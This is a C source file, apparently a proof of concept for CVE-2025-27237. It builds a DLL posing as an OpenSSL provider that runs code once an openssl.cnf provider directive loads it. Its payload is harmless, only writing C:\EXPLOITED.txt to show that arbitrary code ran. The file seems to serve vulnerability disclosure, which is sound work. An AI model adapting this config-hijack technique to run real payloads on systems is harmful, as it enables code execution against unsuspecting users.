#include <windows.h>
#include <stdio.h>

// CVE-2025-27237 Proof of Concept - File-based proof only

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Write proof of execution to file
        HANDLE hFile = CreateFileA("C:\\EXPLOITED.txt",
            GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

        if (hFile != INVALID_HANDLE_VALUE) {
            char buf[1024];
            SYSTEMTIME st;
            GetLocalTime(&st);

            int len = wsprintfA(buf,
                "===========================================\r\n"
                "CVE-2025-27237 EXPLOITATION SUCCESSFUL!\r\n"
                "===========================================\r\n\r\n"
                "This file proves arbitrary code execution\r\n"
                "was achieved via OpenSSL config hijacking.\r\n\r\n"
                "DLL Path: C:\\vcpkg\\...\\poc.dll\r\n"
                "Trigger: openssl.cnf provider directive\r\n"
                "Time: %04d-%02d-%02d %02d:%02d:%02d\r\n",
                st.wYear, st.wMonth, st.wDay,
                st.wHour, st.wMinute, st.wSecond);

            DWORD written;
            WriteFile(hFile, buf, len, &written, NULL);
            CloseHandle(hFile);
        }
    }
    return TRUE;
}

__declspec(dllexport) int OSSL_provider_init(void *handle, void *in, void **out, void **provctx) {
    return 1;
}